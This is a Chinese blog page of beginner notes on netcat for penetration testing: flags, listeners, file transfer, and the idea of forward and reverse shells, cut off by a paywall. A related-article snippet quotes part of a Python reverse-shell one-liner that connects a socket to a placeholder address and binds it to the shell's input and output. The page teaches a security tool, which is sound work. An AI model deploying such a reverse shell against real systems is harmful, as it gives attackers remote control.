渗透由简入深之netcat 学习

已于 2022-02-27 17:24:36 修改
阅读量957 收藏 3
点赞数 1
分类专栏: 渗透工具篇 文章标签: 渗透测试 python php bash
于 2022-02-27 17:19:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Jerry_GuJY/article/details/123165521
版权
本文介绍了netcat的基础参数和用法,包括监听模式、文件传输、shell操作。特别强调了反向shell的概念,分析了其在渗透测试中的应用,并探讨了如何在不同环境下(如bash、php、python)利用netcat建立连接,通过文件描述符进行交互。
摘要由CSDN通过智能技术生成

netcat (NC,瑞士军刀)

一、基本参数描述:
        -h 帮助信息 
        -i secs 延时的间隔 
        -l 监听模式,用于入站连接 
        -L 连接关闭后,仍然继续监听 
        -n 指定数字的IP地址,不能域名服务器
        -o file 记录16进制的传输 
        -p port 本地端口号
        -r 随机本地及远程端口 
        -s addr 本地源地址 
        -t 使用TELNET交互方式 
        -u UDP模式                     
        -v 详细输出--用两个-v可得到更详细的内容 
        -w secs timeout的时间 
        -z 将输入输出关掉--用于扫描时 

二、用法和注意事项:

        1、nc监听的端口必须未被其他程序占用 

        2、实现连接通讯

                服务端 nc -lnvp [端口]

                客户端 nc ip [端口]

        3、文件传入 2进制传输+服务端文件写入

                 服务端 nc -lvp [端口] >[写入文件] |

                客户端 nc [ip][端口] <[发送的文件]
        4、直接使用 socket连接通信

三、shell(正向shell和反向shell)

        正向shell:攻击机连接靶机,攻击机作为客户端,靶机作为服务器,攻击机主动

                           连接靶机。

                           缺点

最低0.47元/天 解锁文章
windows环境netcat安装及使用 -解决方案
zholeiv5
04-07 1426
一、下载地址 https://eternallybored.org/misc/netcat/ 二、安装步骤 解压文件,并将文件中的 nc.exe复制到 C:\Windows\System32此目录下 三、执行步骤 # 开启两个黑窗口 # 第一个执行 nc -l -p 99999 # 第二个执行 nc localhost 99999 四、异常处理 异常提示 :Can't grab 0.0.0.0:99999 with bind 解决方案: 端口冲突,更换端口即可正常运行 ...
红队内网攻防渗透:内网渗透之内网各种工具平台的使用
最新发布
HACKONE的博客
04-10 377
红队内网攻防渗透内网各种工具平台的使用 内网各种工具平台的使用
渗透测试工具--NetCat的使用
dreamer_96的博客
03-04 4858
渗透测试工具--NetCat的使用什么是NetCatNetCat的作用用法常用选项 什么是NetCat 在网络工具中有“瑞士军刀”美誉的NetCat,首次出现在1995年。NetCat其实是一个非常简单的Unix工具,他的实际可运行的名字叫nc。非常棒的是,NetCat可以与其他工具结合和重定向,因此,可以说它是互联网里短小精悍的多功能工具。 NetCat的作用 聊天工具 端口扫描 远程控制 文件传输 telnet/获取banner信息 手动连接网络服务 用法 nc属于kali自带工具,位置如下: ┌─
netcat学习笔记
s0mor
08-23 411
netcat: 相当于网络中的瑞士军刀,它所做的事情是在两台主机间建立连接并返回两个数据流。 主机A:192.168.12.130 主机B:192.168.12.131 一、端口扫描 扫描主机B开放端口: nc -zvn 192.168.12.131 1-999 参数: -u 改变运行模式,默认为TCP,改为UDP -z 适用于扫描,告诉netcat,连接成功后就关闭连接,不进行数据交换 -v...
Netcat学习总结
马赛克的博客
03-23 687
一:前言 一般来说,网络管理员对客户端发起的连接服务器请求比较在意,只要是本机开放的1024端口以下都会进行仔细检查。 对服务器发起的请求就没那么在意了,毕竟端口那么多,不可能对每个端口都了解 利用反向连接能减少被网络管理员发现的概率 注:windows版的netcat可以连接Linux版的netcat,Linux版的netcat也可以连接windows版的netcat,两者在参数和程序功...
渗透测试工具篇——NetCat
tomyyyyy
06-27 225
渗透测试工具篇——NetCat 简介 Netcat 常称为 nc,拥有“瑞士军刀”的美誉。nc 小巧强悍,可以读写TCP或UDP网络连接,它被设计成一个可靠的后端工具,能被其它的程序或脚本直接驱动。同时,它又是一个功能丰富的网络调试和开发工具,因为它可以建立你可能用到的几乎任何类型的连接,以及一些非常有意思的内建功能,它基于socket协议工作。在渗透测试领域,我们通常利用它来反弹shell。 ...
Kali渗透测试1-Netcat
imherer的博客
09-19 175
What is Netcat? Netcat is a featured networking utility which reads and writes data across network connections, using the TCP/IP protocol. It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs a...
【安全测试工程师】超实用的Web渗透测试学习路线~
weixin_44433834的博客
08-02 3307
前言 本文整理的学习路线,清晰明了,重点分明,能快速上手实践,相信想学的同学们都能轻松学完。都是干货啦,先收藏⭐再看吧。本文偏基础能让萌新们快速摸到***测试的门道,少走弯路,也能让正在学习的小伙伴们查漏补缺,也欢迎大佬们在评论区指正错误~ 先上脑图 其实安全测试需要的知识面是非常广的,但跟着教程有重点地学习还是能很快理清思路上手测试的,后续可以自己入研究,吃透这些领域的知识。 首先我们要了解什么是***测试。 我们知道业务功能、逻辑的测试有黑盒测试和白盒测试,前者把程序看作一个不能打开的黑盒子,在完
关于《Python黑帽子:黑客与渗透测试编程之道》的学习笔记
Mi1k7ea
05-04 2万+
本篇文章是学习Python黑帽子:黑客与渗透测试编程之道》的笔记,会持续地将书上的代码自己敲一遍,从而让自己对Python的安全编程有更多的了解,同时希望各位可以给给建议,不足之处太多了。 第一章——设置Python环境: Kali Linux的安装就不说了,最近有更新为2017版的可以下载。 确认是否安装了正确的Python版本: 确认是2.7版本的即可。 接着安装P
【Linux_Kali网络渗透测试学习笔记总结(七)】提升权限
数据库爆破专家的博客
04-30 2992
网络渗透测试(六):提升权限 文章目录网络渗透测试(六):提升权限1.利用本地漏洞2.密码攻击2.1 离线攻击工具2.1.1 hash-dentifier2.1.2 Hashcat2.1.3 RainbowCrack2.1.4 samdump22.1.5 John2.1.6 Johnny2.1.7 Ophcrack2.1.8 Crunch2.2 在线破解工具2.2.1 CeWL2.2.2 Hydr...
记一次对python反弹shell的分析
weixin_30526593的博客
08-28 997
前言 昨天学习了反弹shell,对python弹shell产生了一些疑惑 python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("0.0.0.0",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);...
Windows下安装使用netcat
junR_980218的博客
06-20 7193
Windows下安装使用netcat
Falco 简介
SHELLCODE_8BIT的博客
01-07 3540
Falco简介 什么是Falco? Falco是一款由Sysdig开源的进程异常行为检测工具。它既能够检测传统主机上的应用程序,也能够检测容器环境和云平台(主要是Kubernetes和Mesos)。 它能够检测所有涉及系统调用的进程行为。例如: 某容器中启动了一个shell 某服务进程创建了一个非预期类型的子进程 /etc/shadow文件被读写 /dev目录下创建了一个非设备文件 ls之类的常规系统工具向外进行了对外网络通信 此外,其还可以检测云环境下的特有行为。例如: 创建了带有特权容
Linux Netcat 命令——网络工具中的瑞士军刀
Leo Zhang
04-11 2622
netcat是网络工具中的瑞士军刀,它能通过TCP和UDP在网络中读写数据。通过与其他工具结合和重定向,你可以在脚本中以多种方式使用它。使用netcat命令所能完成的事情令人惊讶。 netcat所做的就是在两台电脑之间建立链接并返回两个数据流,在这之后所能做的事就看你的想像力了。你能建立一个服务器,传输文件,与朋友聊天,传输流媒体或者用它作为其它协议的独立客户端。 下面是一些使用netcat
大数据之流式数据分析实现Socket数据分析
派大星子的博客
12-04 1066
大数据之流式数据分析实现Socket数据分析
【原生版的netcat安装方法】
qq_55213436的博客
06-28 2027
目录前言安装步骤net cat常见命令和说明 Netcat是一款优秀简单的Unix工具,很可靠很容易使用,使用的是tcp和udp协议。在网络安全和渗透测试中是不可少的黑客工具,被称为安全界的瑞士军刀。
netcat
qq726232111的博客
04-15 1423
1 历史 1 netcat创建于1995年,开发到1996年的前几个月时,由Avian Research (avian.org)发布了v1.10. netcat及其相关软件包由Avian Research开发,且开源 2 netcat的另一个分支为GNU Netcat,用于改进可移植性、可用性和功能设计 官网 http://netcat.sourceforge.net/ 该项目的目标是与广泛使用的原始NC 1.10完全兼容,并且具有可移植性 不同分支的nc基本上都兼容 ...
windows环境下netcat安装及使用
热门推荐
qq_37585545的博客
08-31 7万+
1.下载netcat。下载地址:https://eternallybored.org/misc/netcat/ 2.解压文件夹‘ 3.将文件夹中的所有内容复制到C:\Windows\System32的文件夹下 4.打开命令界面:Windows+R  cmd。输入nc 命令即可....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值